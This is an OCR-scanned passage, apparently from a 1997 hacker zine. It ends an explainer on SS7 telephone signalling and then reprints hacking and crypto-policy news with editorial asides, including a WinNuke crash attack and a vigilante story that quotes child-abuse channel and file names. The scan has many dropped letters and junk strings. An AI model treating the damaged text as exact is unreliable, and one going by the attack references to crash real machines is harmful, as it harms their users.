Connect mated STP pairs together. 
D Links: 


Interconnect STP quads. 


eal 


Links: 
Connect SSP/SPs or SCPs to a STP pair other than their "home" pair. 
F Links: 
Connect SSP/SPs and SCPs to each other. 
Links are joined together to form linksets. A linkset is defined as all 
the links connecting one node in the network to another node. Directly 
analogous to linksets are routesets which map out the paths to all the other 


nodes in the network by associating a cost with each possible linkset the 
message could go out on. 


If that sounded confusing (and I know it did) here is a small example. 
Consider the following subsection from our bigger network: 


ti# (SP1) 
## (SSP1) 
\ 
Ll L2 
\ 
[STP1] ---- [STP2]-- 
\ / | 
\ / | 
\/ | 
/ \ | 
[STP3] ---- [STP4] | 
\ / 
(SSP2) 
# 
Ht aE aE aE aE aE aE aE ae aE aE aE ae aE aE aE aE aE aE 


Say SSP1 wants to send a message to SSP2. The routeset to SSP2 on SSP1 
will be datafilled with two possible linksets that could be used; namely the 
ones going to STP1 and STP2. However, it’s obvious that using L2 would be more 
efficient, taking 2 hops instead of 3, via Ll. On the switch this would be 
noted by L2 having a lower cost than Ll. 


DoD0D0DOD0D0D00D0000000000 
o Call Setup Example fe) 
DoDDD0DOD0DOD00D0000000000 


Call setup and takedown using CCS7 is handled by a subset of the 
protocol called ISDN-UP (Integrated Services Digital Network User Part). There 
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are many messages belonging in this subset but only five are needed to make a 
phone call. 


Let’s say I want to call Dr. Sardu using the network from the previous 

xample. The good doctor’s phone is serviced by SSP2 while mine is serviced 
by SSP1. When I pick up my phone the switch will detect that it is off the 
hook and send a dial tone. After dialing, an IAM (Initial Address Message) 
will go out on the network from SSP1 to SSP2. Assuming all goes well (the 
hone is not busy, etc...) an ACM (Address Complete Message) will come back 
rom SSP2 to SSP1l. It is at this time that I hear the first ring tone in my 
ceiver. The moment the other party picks up and all the trunks are seized 
n ANM (Answer Message) is sent from SSP2 to SSP1 and upon reception of this 
essage billing starts (A few ms of fr phone time. Woo woo!). When the 
onversation is complete and one party hangs up, its switch will send an REL 
Release Message) and upon reception the other party will hear the "click" of 
he phone being hung up. When he then hangs up the final RCL (Release Complete) 
message will be sent and the seized trunks will return to idle. 


t#2nasoH HO 


----[ EOF 
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Oxl: Illinois man arrested after threatening Bill Gates 
Ox2: Man Arrested In Tokyo On Hacker Charges 

0x3: FBI says hacker sold 100,000 credit card numbers 

Ox4: MS Security Plugs Not Airtight 

Ox5: BSA slams DTI’s Encryption Plans 

Ox6: Teen bypasses blocking software 

Ox7: The Power to Moderate is the Power to Censor 

Ox8: AOL Users in Britain Warned of Surveillance 

0x9: Georgia Expands the "Instruments of Crime" 

Oxa: NASA Nabs Teen Computer Hacker 

Oxb: Agriculture Dept. Web Site Closed after Security Breach 
Oxc: Hackers Smash US Government Encryption Standard 

Oxd: Hacker May Stolen JonBenet computer Documents 

Oxe: Hacker Vows ’Terror’ for Pornographers 

Oxf: Mitnick Gets 22 Month Sentence 

0x10: New York Judge Prohibits State Regulation of Internet 


Oxll: Breaking the Crypto Barrier 
0x12: Setback in Efforts to Secure Online Privacy 
0x13: Captain Crunch Web Site Now Moved 
0x14: US Justive Dept. Investigating Network Solutions 
0x15: Cyber Patrol Bans Crypt Newsletter 
0x16: Some humor on media hacks and hackers 
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Court Mixes Internet Smut Provision 


Oxl: Book Title: Underground 
0x2: Book Title: "Hackers" 


Oxl: Convention: Cybercrime Conference Announcement 
Ox2: Convention: Computers & The Law IV Symposium 


Ox1> 


Title: Illinois man arrested after threatening Bill Gates 
Source: Reuter 
Author: unknown 


SEATTLE (Reuter) - An Illinois man has been arrested and charged with 
threatening to kill Microsoft Corp. Chairman Bill Gates in a $5 
million extortion plot, authorities said on Friday. 


Adam Pletcher was arrested on May 9 in the Chicago suburb of Long 
Grove, where he lives with his parents, and charged with extortion, 
federal prosecutors said. He was freed on $100,000 bond and is due to 


appear in U.S. District Court in Seattle on Thursday for arraignment. 


According to court documents, Pletcher sent four letters to Gates, 
beginning in March, threatening to kill the software company founder 
and his wife, Melinda, unless payment of at least $5 million was made. 


The first letter was intercepted at the company’s headquarters in 
Redmond, Washington, by corporate security officers, who contacted the 
FBI. 


Agents then used an America Online dating service specified by the 
author of the letters to track down Pletcher, described as a loner in 
his early 20s who spends much of his time in front of the computer. 


17 
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Authorities said they treated the threats seriously but did not 
believe Gates’ life was ever in danger. 


"We generally think this was a kid with a rich fantasy life, just 
living that out," said Tom Ziemba, a spokesman for U.S. Attorney 
Katrina Pflaumer. 


"This was handled in a fairly routine fashion by Microsoft security 
and law enforcement agencies," Microsoft spokesman Mark Murray said. 
"At some point in the investigation Microsoft did make Bill aware of 
the situation." 


Pletcher’s online activities have landed him in trouble before. 


In February the Illinois attorney general sued Pletcher, accusing him 
of defrauding consumers of thousands of dollars in an alleged Internet 
scam, according to a story in the Chicago Tribune. Several consumers 
complained they sent Pletcher up to $5,500 to find them a car deal and 
never got their money back. 


Despite his status as richest man in America, with a Microsoft stake 
valued at more than $30 billion, Gates is still known to travel alone 
on regularly scheduled flights. But Murray said the executive was 
well-protected. 


"We don’t comment at all on Bill’s security other than to say that 
there ar xtensive and appropriate security measures in place for 
Bill, for his family and for Microsoft facilities and personnel," 
Murray said. 


Ox2> 


Title: Man Arrested In Tokyo On Hacker Charges 
Source: unknown 
Author: unknown 


TOKYO (May 23, 1997 10:31 a.m. EDT) - A 27-year-old Japanese man was 
arrested Friday on suspicion of breaking into an Internet home page of 
Asahi Broadcasting Corp. and replacing it with pornography, a police 
spokesman said. 


Koichi Kuboshima, a communications equipment firm employee from Saitama 
Prefecture, north of Tokyo, was arrested on charges of interrupting 
business by destroying a computer network. 


It was the first arrest related to illegal access to the information 
network, the police spokesman said, adding Kuboshima was also charged 
with displaying obscene pictures, the spokesman said. 


he suspect admitted to the crime, telling police he had done it for 
fun, police officials said. 


he Osaka-based broadcasting network blocked access to all of its home 
pages on Sunday immediately after it was notified of the offense by an 
nternet user. 


H 


The Asahi home page is designed to allow users to download and upload 
information, which allowed Kuboshima to rewrite the contents, the 
spokesman said. 


Ox3> 


Title: FBI says hacker sold 100,000 credit card numbers 
Source: unknown 
Author: unknown 


SAN FRANCISCO (May 23, 1997 10:13 a.m. EDT) -- A clever hacker slipped 
into a major Internet provider and gathered 100,000 credit card 
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numbers along with enough information to use them, the FBI said 
Thursday. 


Carlos Felipe Salgado, Jr., 36, who used the online name "Smak," 
allegedly inserted a program that gathered the credit information from 
a dozen companies selling products over the Internet, said FBI 
spokesman George Grotz. 


[Secure electronic commerce is a novel idea. ] 


Salgado allegedly tried to sell the credit information to an 
undercover agent for $260,000. He was arrested Wednesday and faces a 
maximum 15 years in prison and $500,000 in fines if convicted on 
charges of unauthorized access of computers and trafficking in stolen 
credit card numbers. 


"What is unique about this case is that this individual was able to 
hack into this third party, copy this information and encrypt it to be 
sold," Grotz said. 


[Since we know others have hacked in and stolen credit cards before, 
the unique part is him trying to sell them. That isn’t in keeping 
with what federal agents love to say about hackers and credit card 
incidents. Convenient how they change things like that.] 


Had it succeeded, "at minimum we’d have 100,000 customers whose 
accounts could have been compromised and would not have known it until 
they got their bill at the end of the month," the FBI spokesman said. 


The scheme was discovered by the unidentified San Diego-based Internet 
provider during routine maintenance. Technicians found an intruder had 
placed a program in their server called a "packet sniffer," which 
locates specified blocks of information, such as credit card numbers. 


Uh...more like they kept a nice ascii database full of the numbers 
that was copied with expert technique like "cp ccdb"...] 


The FBI traced the intruder program to Salgado, who was using an 
account with the University of California-San Francisco. 


A school spokeswoman said officials have not yet determined whether 
Salgado attended or worked at the school, or how he got access to the 
account. 


With the cooperation of a civilian computer user who was in 
communication with Salgado, the FBI arranged to have an undercover 
agent buy the stolen credit card information. 


After making two small buys, the FBI agents arranged to meet Salgado 
on Wednesday at San Francisco International Airport to pay $260,000 
for 100,000 credit card numbers with credit limits that ranged up to 
$25,000 each. 


After decrypting and checking that the information was valid, Salgado 
was taken into custody at his parents’ house in Daly City. Salgado 
waived his rights and acknowledged breaking into computers, including 
the San Diego company, according to the affidavit. 


The FBI has not found any evidence Salgado made any purchases with the 
numbers himself, the spokesman said, but the investigation is 
continuing. 


Salgado appeared before a federal magistrate Thursday and was released 
on a $100,000 personal bond. Grotz said that as a condition of bail, 
"the judge forbids him to come anywhere near a computer." 


Ox4> 
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Title: MS Security Plugs Not Airtight 
Source: unknown 
Author: Nick Wingfield 


(May 22, 1997, 12:45 p.m. PT) Microsoft (MSFT) is still struggling to 
completely patch Windows 95 and NT against Internet hacker attacks. 


The company has posted a software patch that protects Windows 95 users 
from an attack that can crash their computers. The company issued a 
Similar patch for Windows NT last week. 


But both the Windows NT and 95 patches aren’t complete prophylactics for 
so-called out-of-band data attacks since both platforms can still be 
crashed by hackers with Macintosh and Linux computers. Microsoft said 
today that it hopes to post new patches by tonight that remedy the 
vulnerability to Mac- and Linux-based attacks. 


The current Windows 95 patch--without protection for Mac and Linux 
attacks--can be downloaded for free from Microsoft’s Web site. 


[This year, Microsoft programmers have been forced to create a medicin 
chest of software remedies to fix potential security risks in everything 
from the Internet Explorer browser to PowerPoint to Windows itself. Some 
security experts believe the company is struggling with deep-rooted 
vulnerabilities in its OS and Internet technologies. 


It’s clear that the Internet has made it much easier for enterprising 
bug-finders to broadcast their discoveries to the press and public over 
email lists and Web pages. This has put intense pressure on 

Microsoft’s engineering groups to quickly come up with patches. 


Other companies, such as Sun Microsystems, have also had to release a 
number of patches for their technologies, but Microsoft has been 
especially hard-hit. 


A number of security experts believe that Microsoft would have had a 
hard time avoiding these security problems. 


"As a professional programmer, I have a real hard time saying that 
Microsoft should have seen this coming," said David LeBlanc, senior 
Windows NT security manager at Internet Security Systems, a developer of 
security software. "I get hit with this stuff too. With 20/20 hindsight, 
it’s really obvious to see what we did wrong. Trying to take into 
account all the possibilities that can occur beforehand is not 
realistic." 


In order to exploit the latest vulnerability, Web sites must send a 
special TCP/IP command known as "out of band data" to port 139 of a 
computer running Windows 95 or NT. Hackers could also target users’ PCs 
by using one of several programs for Windows, Unix, and Macintosh now 
circulating on the Net. With one program, called WinNuke, a hacker 
simply types a user’s Internet protocol address and then clicks the 
program’s "nuke" button in order to crash a PC over the Net. 


The company’s original patch for Windows NT prevents attacks from Unix 
and other Windows computers. But because of a difference in the way 
Mac and Linux computers handle the TCP protocol, Microsoft’s patch 
didn’t squelch attacks from those operating systems. 


[Bullshit meter: ****- - In actuality, Microsoft just decided to 
filter hits on that port looking for a keyword included in the 
first /’/winuke’ script. By changing that word, 95 was once again 
vulnerable to these attacks. Good work Microsoft.] 


A number of users have sent email to CNET’s NEWS.COM complaining that 
their computers were repeatedly crashed as they chatted in Internet 
relay chat groups. When users are nuked by a hacker, their computer 
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screens often display an error message loosely known as the "blue screen 
of death." 


"The worst part about it is that the delinquents playing with this toy 
really like to play with it and keep on doing it," said Martin A. 
Childs, a law student at Louisiana State University in Baton Rouge. "The 
first time I got hit, I logged on six times before I managed to figure 
out what was going on." 


The original patches for Windows NT versions 4.0 and 3.51 are available 
on Microsoft’s Web site. Last Thursday, the company also posted a 
collection of software patches, called service pack 3, that contains the 
NT out-of-band fix. 


The out-of-band data attacks also affect users of Windows 3.11, but a 
company spokeswoman said that Microsoft will not prepare a fix for that 
platform unless users request on 


Ox5> 


Title: BSA slams DTI’s Encryption Plans 
Source: The IT Newspaper 

Author: unknown 

Date: 26th June 1997 


Government Proposals on encryption are ‘unworkable, unfar, unweildy, 
un-needed and frankly unacceptable’, according to the British Software 
Alliance (BSA) and the British Interactive Multimedia Association (Bima), 
writes Tim Stammers. 


In a joint statement, the organizations claimed that encryption 
proposals from the DTI could ’cripple the growth of electronic comerce in 
the UK’. 


Tod Cohen, lawyer at Covington & Berling, council to the BSA, said: 
‘These proposals could be a disaster for both users and vendors’. 


The DTI’s plan calls for UK organisations which want to encrypt email 
and data to supply copies of their encryption keys to third parties. 


Government agencies will then be able to demand access to copies of the 
keys. The DTI says the scheme aims to prevent criminal use of encryption 
by drug dealers and terrorists. 


But the BSA and BIMA claim that the proposed tystem will create a 
massive bureaucratic structure will criminals will ignore. 


‘The sheer number of electronic communications could easily overwhelm 
the system, without inreasing security or safety within the UK’, their 
statement said. 


Sean Nye, executive member of Bima, said : ’In an age where personal 
data and information is increasingly threatened with unwarranted 
exposure, the DTI’s proposals are a major step backwards’. 


Opposition to the so-called key escrow system suggested by the DTI has 
been widespread. Public opponents include Brian Gladman, former deputy 
director at Nato’s labratories. 

The proposals where formulated under the last government, and a 
decision on their future is expected next month. 


The US government is easing encryption export controls for software 
companies which are prepared to back key escrow, but has met Senate 
opposition to its plans. 


Ox6> 
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Title: Teen bypasses blocking software 
Sounce: www.news.com 

Author: Courtney Macavinta 

Date: April 22, 1997, 5:30 p.m. PT 


A teenager is using his Web site to help others bypass one brand 
of filtering software intended to protect minors from illicit Net 
material. 


Using the "CYBERsitter codebreaker" from 18-year-old Bennett 
Haselton, surfers can now decode the list of all Net sites 
blocked by Solid Oak’s Cybersitter software. 


Haselton--the founder of a teen organization called Peacefire 
that fights Net censorship--contends that the software violates 
free speech rights for adults and teen-agers. He claims the 
software is also falsely advertised because it promises parents 
the "ability to limit their children’s access to objectionable 
material on the Internet," but also blocks other content on the 
Net. 


Haselton’s campaign to get around Cybersitter has Solid Oak’s 
president seeing red. 


Solid Oak denies Haselton’s charges and is investigating the 
legality of the code-breaking program. "He doesn’t know anything, 
and he’s just a kid," Solid Oak President Brian Milburn said 
today. "We have never misrepresented our product--ever." 


Haselton’s Cybersitter codebreaker can be used to crack a coded 
list of the sites that CYBERsitter blocks. The list is 
distributed to subscribers to notify users what sites are being 
blocked. Subscribers pay $39.95 for the software. 


The software blocks sites containing any words describing 
genitals, sex, nudity, porn, bombs, guns, suicide, racial slurs 
and other violent, sexual and derogatory terms. 


The list also blocks an array of sites about gay and lesbian 
issues, including PlanetOut and the International Gay and Lesbian 
Human Rights Commission . Cybersitter even blocks the National 
Organization for Women because it contains information about 
lesbianism, Solid Oak stated. "The NOW site has a bunch of 
lesbian stuff on it, and our users don’t want it," said Milburn. 


The software also filters any site that contains the phrase 
"Don’t buy CYBERsitter" as well as Haselton’s own site and any 
reference to his name. 


Milburn says Haselton’s campaign is hurting the product’s 
marketability and hinted that the company will stop him, but 
wouldn’t say exactly how. 


"We have users who think they purchased a secure product. This is 
costing us considerably," Milburn said. "But we’re not going to 
let Bennett break the law." 


He did point out that Haselton’s program to decode the software 
may violate its licensing agreement, which states: "Unauthorized 
revers ngineering of the Software, whether for educational, 
fair use, or other reason is expressly forbidden. Unauthorized 
disclosure of CYBERsitter operational details, hacks, work around 
methods, blocked sites, and blocked words or phrases are 
expressly prohibited." 


Haselton is undaunted by the suggestion of legal reprecussions. 
"I’ve talked to a lawyer who offered to represent me in the event 
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Haselton, a junior at Vanderbuilt University, argues that the 
software doesn’t protect kids from smut, but just keeps them from 
learning new ideas. 


"Blocking software is not the solution to all of our problems. 
What’s dangerous is not protecting [teenagers’ free] speech on 
the Net as well," he said. "This is the age, when you form your 
opinions about social issues, human rights, and religion. We need 
to keep free ideas on the Net for people under 18." 


Haselton’s organization is also a plaintiff in a lawsuit being 
argued today in New York, the American Library Association vs. 
Governor George Pataki. The case was filed to strike down a state 
law similar to the Communications Decency Act that prohibits 
making indecent material available to minors over the Net. 


Ox7> 


Title: The Power to Moderate is the Power to Censor 
Source: unknown 
Author: Paul Kneisel 


Some 200+ new news groups have just been created on the UseNet part of the 
Internet. They are grouped under a new <gov.*> hierarchy. 


<gov.*> promises to "take democracy into cyberspace," according to the 
press release from the National Science Foundation.[1] "The U.S. 
government," said U.S. Vice President Al Gore of the GovNews project, "is 
taking a leadership role in providing technology that could change the face 
of democracy around the world."[2] 


The GovNews project repeatedly stresses how it will support and promote 
feedback between governments and citizens. "Millions of people will now be 
able to follow and comment on government activity in selected areas of 
interest...," the release stated, promising "a wide, cost-effective 
electronic dissemination and discussion...." 


Preston Rich, the National Science Foundation’s leader of the International 
GovNews Project, described GovNews as "newsgroups logically organized by 
topic from privatization, procurements and emergency alerts to toxic waste 
and marine resources and include[s] the capability to discuss such 
information."[1] 


The vast majority of the new <gov.*> groups are moderated. 


The idea of the moderated news 

group is increasingly accepted on UseNet. Off-topic posts, flames, and spam 
have made many non-moderated groups effectively unreadable by most users. 
Moderated groups are on ffective way around these problems. New groups 
created in the non-<gov.*> "Big 8" UseNet hierarchy have formal charters 
defining the group. If the group is moderated then the powers, identity, 
and qualifications of the moderators are also listed. Unmoderated groups 
might be likened to informal fr for-all debates where there is no check 
on who can participate or on the form or content of what is said. Moderated 
groups are far closer to a specially-defined meeting of citizens with a 
formal Chair, empowered to declare certain topics off-limits for 
discussion, and to call unruly participants to order. 


An unmoderated UseNet group dedicated to baking cookies might be flooded 
with posts advertising bunion cures, reports of flying saucers sighted over 
Buckingham Palace, or articles denouncing Hillary Clinton as a Satanist. A 
moderator for the group has the power to block all of these posts, ensuring 
that they are not sent to the UseNet feed and do not appear among the 
on-topic discussion of cookies. 


Certainly some moderators on UseNet groups abuse their powers (as do some 
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Chairs at non-Internet meetings.) But reports of such abuse are relatively 
rare given the number of moderated groups. And, of course, many complaints 
come from the proverbial "net.kooks" or those who oppose moderation in 
general. 


Moderators in the "Big 8" UseNet hierarchy are "civilians," not government 
mployees moderating government-related groups while collecting government 
paychecks. 


The <gov.*> hierarchy inferentially changes this. I write "inferentially" 
because the charters, names and qualifications of the moderators in the 
200+ groups has not been formally announced. Nor do routine queries to 
members of the <gov.*> leading Hierarchial Coordinating Committee result in 
such detailed information. 


UseNet is not th ntire Internet. Net-based technology like the World Wide 
Web and the "File Transfer Protocol" or FTP are designed for the one-way 
transmission of data. Few object to the _Congressional Record_ on-line or 
crop reports posted by the U.S. Department of Agriculture available on the 
Web or via FTP. But the news groups of UseNet are designed for two-way 
discussions, not spam-like one-way info-floods of data carefully selected 
by government bureaucrats. 


That creates an enormous problem when government employees moderate th 
discussion, regardless of how well, appropriately, or fairly the moderation 
is conducted. 


For government moderation of any discussion is censorship and it is wrong. 


Initial reports also indicate that most of the <gov.*> groups will be "robo 
[t]-moderated." In other words, specialized software programs will handle 
the bulk of the moderator’s tasks. Robo-moderation, however, alters 


nothing. A good robo program may catch and eliminate 99% of the spam sent 
to the group or identify notorious flame-artists. But the power to 
robo-moderate remains the power to censor; the power to select one 
robo-moderator is the power to select another; the power to automatically 
remove bunion ads is simultaneously the power to eliminate all posts from 
Iraq in a political discussion or any message containing the string 
"Whitewater." 


In short, moderation on <gov.*> groups by government employees remains 
censorship whether conducted by software or humans, whether posts are 
approriately banned or the moderation places severe limits on free 
political speech. *Any* limitation of posts from any citizen by any 
government employ is censorship. 


It is also forbidden by law. 


FOOTNOTES 
[1] "GOVNEWS: N[ational] S[cience] F[oundation] Press Release for GovNews," 
17 Mar 1997, <http://www.govnews.org/govnews/info/press.html>, accessed 21 
Mar 1997. 


[2] One wonders what technology Gore believes GovNews is providing. 
Certainly neither the Internet or UseNet is part of that technology for 
both existed long before GovNews.%*Z 


Ox8> 


Title: AOL Users in Britain Warned of Surveillance 
Source: unknown 
Author: CHristopher Johnston 


LONDON - Subscribers logging onto AOL Ltd. in Britain this week 
were greeted with news that the Internet-service provider was 
imposing a tough new contract giving it wide latitude to disclose 
subscribers’ private E-mail and on-line activities to law 
enforcement and security agencies. 
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The new contract also requires users to comply with both British 
and U.S. export laws governing encryption. AOL Ltd. is a 
subsidiary of AOL Europe, which is a joint venture between 
America Online Inc. of the United States and Germany’s 
Bertelsmann GmbH. 


The contract notes in part that AOL ’’reserves the right to 
monitor or disclose the contents of private communication over 
AOL and your data to th xtent permitted or required by law.’’ 


'’Tt’s bad news,’’ said Marc Rotenberg, director of the 
Electronic Privacy Information Center, a Washington-based civil 
liberties organization. ’’I think AOL is putting up a red flag 
that their commitment to privacy is on the decline. It puts 
their users on notice that to th xtent permitted by law, they 
can do anything they want.’’ 


The contract also prohibits subscribers from posting or 
transmitting any content that is ’’unlawful, harmful, 
threatening, abusive, harassing, defamatory, vulgar, obscene, 
seditious, blasphemous, hateful, racially, ethnically or 
otherwise objectionable.’’ 


AOL and its competitors called the move part of a trend to 

protect on-line service providers from suits by users in case 
they are required to disclose subscribers’ activities to law 
nforcement agencies. 


The contract also beefed up the legal wording relating to 
sensitive content such as pornography, and prohibiting the 
maintenance of links to obscene Web sites. 


The updated contract is also the first to inform subscribers that 
they are required to comply with both British and U.S. export 
laws governing encryption, or coding, a hot topic of debate 
recently between software publishers and security agencies. 


AOL Europe will provide similar contracts, which vary according 
to local law in each of the seven European countries in which the 
network operates. 


AOL executives denied any government pressure in updating the 
contract. 


Ox9> 


Title: Georgia Expands the "Instruments of Crime" 
Source: fight-censorship@vorlon.mit.edu 


In Georgia it is a crime, punishable by $30K and four years to use in 
furtherance of a crime: 


a telephone 

a fax machine 
a beeper 
email 


yt, ie ee 


The actual use of the law, I think, is that when a person is selling drugs 
and either is in possession of a beeper, or admits to using the phone to 
facilitate a meeting, he is charged with the additional felony of using a 
phone. This allows for selectiv nforcement of additional penalties for 
some people. 


O.C.G.A. 16-13-32.3. 


(a) It shall be unlawful for any person knowingly or intentionally to 
use any communication facility in committing or in causing or 


16.txt Wed Apr 26 09:43:42 2017 10 


facilitating the commission of any act or acts constituting a felony 
under this chapter. Each separate use of a communication facility 
shall be a separate offense under this Code section. For purposes of 
this Code section, the term "communication facility" means any and all 
public and private instrumentalities used or useful in the 
transmission of writing, signs, signals, pictures, or sounds of all 
kinds and includes mail, telephone, wire, radio, computer or computer 
network, and all other means of communication. 


(b) Any person who violates subsection (a) of this Code section shall 
be punished by a fine of not more than $30,000.00 or by imprisonment 
for not less than one nor more than four years, or both. 


Oxa> 


Title: NASA Nabs Teen Computer Hacker 
Source: Associated Press 

Author: unknown 

Date: Monday, June 2, 1997 


WASHINGTON (AP) A Delaware teen-ager who hacked his way into a 
NASA web site on the Internet and left a message berating U.S. 
officials is being investigated by federal authorities, agency 
officials said Monday. 


NASA Inspector General Robert Gross cited the incident - the most 
recent example of a computer invasion of a NASA web site - as an 
example of how the space agency has become ‘‘vulnerable via the 
Internet.’’ 


"We live in an information environment vastly different than 20 
years ago," Gross said in a written statement. "Hackers are 
increasing in number and in frequency of attack." 


In the latest case, the Delaware teen, whose name, age and 
hometown were not released, altered the Internet web site for the 
Marshall Space Flight Center in Huntsville, Ala., according to 
the statement from the computer crimes division of NASA’s 
Inspector General Office. 


"We own you. Oh, what a tangled web we weave, when we practice to 
deceive," the teen’s message said, adding that the government 
systems administrators who manage the site were "extremely 
stupid." 


The message also encouraged sympathizers of Kevin Mitnick, a 
notorious computer hacker, to respond to the site. Mitnick was 
indicted last year on charges stemming from a multimillion-dollar 
crime wave in cyberspace. 


The altered message was noticed by the computer security team in 
Huntsville but the NASA statement did not mention how long the 
message was available to the public or exactly when it was 
discovered. NASA officials weren’t made available to answer 
questions about the event. 


In the statement, NASA called the teen’s hacking "a cracking 
spree" and said it was stopped May 26 when his personal computer 
was seized. 


Prosecutors from the U.S. Attorney’s office in Delaware and 
Alabama are handling the case with NASA’s computer crimes 
division. 


Last March, cyberspace invaders made their way into another NASA 
web site and threatened an electronic terrorist attack against 
corporate America. The group, which called itself ‘‘H4G1S’’ in 
one message and ‘*‘HAGIS’’ in another, also called for some 
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well-known hackers to be released from jail. 


Engineers at the Goddard Space Flight Center in Greenbelt, Md., 
quickly noticed the change and took the page off the Internet 
within 30 minutes. NASA officials said the agency installed 
electronic security measures designed to prevent a recurrence. 


Oxb> 


Title: Agriculture Dept. Web Site Closed after Security Breach 
Source: Reuter 
Author: unknown 


WASHINGTON (June 11, 1997 00:08 a.m. EDT) - The U.S. Agriculture 
Department’s Foreign Agricultural Service shut down access to its 
internet home page Tuesday after a major security breach was 
discovered, a department aide said. 


"It’s a big, huge problem," Ed Desrosiers, a computer specialist 
in USDA’s Farm Service Agency, told Reuters. "We can’t guarantee 
anything’s clean anymore." 


Someone broke into system and began "Sending out a lot of 
messages" to other "machines" on the internet, Desrosiers said. 


The volume of traffic was so great, "we were taking down machines" 
and began receiving complaints, he said. 


"It’s not worth our time to try to track down" the culprit, 
Desrosiers said. "Instead, we’re just going to massively increase 
security." 


A popular feature on the FAS home page is the search function for 
"attache reports," which are filed by overseas personnel and 
provide assessments on crop conditions around the world. Although 
not official data, the reports provide key information that goes 
into USDA’s monthly world supply-and-demand forecasts. 


It could be next week before the page is open to outside users 
again, Desrosiers said. 


Oxc> 


Title: Hackers Smash US Government Encryption Standard 
Source: fight-censorship@vorlon.mit.edu 


Oakland, California (June 18, 1997)-The 56-bit DES encryption 
standard, long claimed "adequate" by the U.S. Government, was 
shattered yesterday using an ordinary Pentium personal computer 
operated by Michael K. Sanders, an employee of iNetZ, a Salt Lake 
City, Utah-based online commerce provider. Sanders was part of a 
loosely organized group of computer users responding to the "RSA 
$10,000 DES Challenge." The code-breaking group distributed computer 
software over the Internet for harnessing idle moments of computers 
around the world to perform a '’brute force’ attack on the encrypted 
data. 


"That DES can be broken so quickly should send a chill through the 
heart of anyone relying on it for secure communications," said Sameer 
Parekh, one of the group’s participants and president of C2Net 
Software, an Internet encryption provider headquartered in Oakland, 
California (http://www.c2.net/). "Unfortunately, most people today 
using the Internet assume the browser software is performing secure 
communications when an image of a lock or a key appears on the 
screen. Obviously, that is not true when the encryption scheme is 
56-bit DES," he said. 


INetZ vice president Jon Gay said "We hope that this will encourage 
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people to demand the highest available encryption security, such as 
the 128-bit security provided by C2Net’s Stronghold product, rather 
than the weak 56-bit ciphers used in many other platforms." 


Many browser programs have been crippled to use an even weaker, 40-bit 
cipher, because that is the maximum encryption level the 
U.S. government has approved for export. "People located within the US 
can obtain more secure browser software, but that usually involves 
submitting an affidavit of eligibility, which many people have not 
done," said Parekh. "Strong encryption is not allowed to be exported 
from the U.S., making it harder for people and businesses in 
international locations to communicate securely," he explained. 


According to computer security expert Ian Goldberg, "This effort 
emphasizes that security systems based on 56-bit DES or 
"export-—quality" cryptography are out-of-date, and should be phased 
out. Certainly no new systems should be designed with such weak 
encryption.’’ Goldberg is a member of the University of California at 
Berkeley’s ISAAC group, which discovered a serious security flaw in 
the popular Netscape Navigator web browser software. 


he 56-bit DES cipher was broken in 5 months, significantly faster 

han the hundreds of years thought to be required when DES was adopted 
Ss a national standard in 1977. The weakness of DES can be traced to 
ts "key length," the number of binary digits (or "bits") used in its 
neryption algorithm. "Export grade" 40-bit encryption schemes can be 
roken in less than an hour, presenting serious security risks for 
ompanies seeking to protect sensitive information, especially those 
hose competitors might receive code-breaking assistance from foreign 
governments. 


Zza0o0godr-ow tH 


According to Parekh, today’s common desktop computers are tremendously 
more powerful than any computer that existed when DES was 

created. "Using inexpensive (under $1000) computers, the group was 
able to crack DES in a very short time," he noted. "Anyone with the 
resources and motivation to employ modern "massively parallel" 
supercomputers for the task can break 56-bit DES ciphers even faster, 
and those types of advanced technologies will soon be present in 
common desktop systems, providing the keys to DES to virtually 
everyone in just a few more years." 


56-bit DES uses a 56-bit key, but most security experts today consider 
a minimum key length of 128 bits to be necessary for secure 
encryption. Mathematically, breaking a 56-bit cipher requires just 
65,000 times more work than breaking a 40-bit cipher. Breaking a 
128-bit cipher requires 4.7 trillion billion times as much work as one 
using 56 bits, providing considerable protection against brute-force 
attacks and technical progress. 


C2Net is the leading worldwide provider of uncompromised Internet 
security software. C2Net’s encryption products are developed entirely 
outside the United States, allowing the firm to offer full-strength 
cryptography solutions for international communications and 

commerce. "Our products offer the highest levels of security available 
today. We refuse to sell weak products that might provide a false 
sense of security and create easy targets for foreign governments, 
criminals, and bored college students," said Parekh. "We also oppose 
so-called "key escrow" plans that would put everyone’s cryptography 
keys in a few centralized locations where they can be stolen and sold 
to the highest bidder," he added. C2Net’s products include the 
Stronghold secure web server and SafePassage Web Proxy, an enhancement 
that adds full-strength encryption to any security-crippled "export 
grade" web browser software. 


Oxd> 


Title: Hacker May Stolen JonBenet computer Documents 
Source: Associated Press 
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BOULDER, Colo. (June 13, 1997 07:38 a.m. EDT) -- A computer hacker has 


infiltrated the system set aside for authorities investigating the slaying 
of JonBenet Ramsey, the latest blow to a heavily criticized inquiry. 


[...despite the computer not being online or connected to other computers..] 


Boulder police spokeswoman Leslie Aaholm said the computer was "hacked" 
sometime early Saturday. The incident was announced by police Thursday. 


"We don’t believe anything has been lost, but we don’t know what, if 
anything, has been copied," said Detective John Eller, who is leading the 
investigation into the slaying of the 6-year-old girl nearly six months ago. 


The computer is in a room at the district attorney’s office that police 
share with the prosecutor’s investigators. The room apparently had not been 
broken into. Computer experts with the Colorado Bureau of Investigations 
were examining equipment to determine what had been done. 


[Bullshit. It was later found out that the machine was not hacked at all.] 


Oxe> 


Title: Hacker Vows ’Terror’ for Pornographers 
Source: Wired 
Author: Steve Silberman 


After 17 years in the hacker underground, Christian Valor - well known 
among old-school hackers and phone phreaks as "Se7en" - was convinced 
that most of what gets written in the papers about computers and hacking 
is sensationalistic jive. For years, Valor says, he sneered at reports 
of the incidence of child pornography on the Net as 
"exaggerated/over-hyped/fearmongered/bullshit." 


Now making his living as a lecturer on computer security, Seven claims 
he combed the Net for child pornography for eight weeks last year 
without finding a single image. 


That changed a couple of weeks ago, he says, when a JPEG mailed by an 
anonymous prankster sent him on an odyssey through a different kind of 
underground: IRC chat rooms with names like #littlegirlsex, ftp 
directories crammed with filenames like 6yoanal.jpg and 8&dad.jpg, and 
newsgroups like alt.binaries.pictures.erotica.pre-teen. The anonymous 
file, he says, contained a "very graphic" image of a girl "no older 
than 4 years old." 


On 8 June, Seven vowed on a hacker’s mailing list to deliver a dose of 
"genuine hacker terror" to those who upload and distribute such images 
on the Net. The debate over his methods has stirred up tough questions 
among his peers about civil liberties, property rights, and the ethics 
of vigilante justice. 


A declaration of war 


What Se7en tapped into, he says, was a "very paranoid" network of 
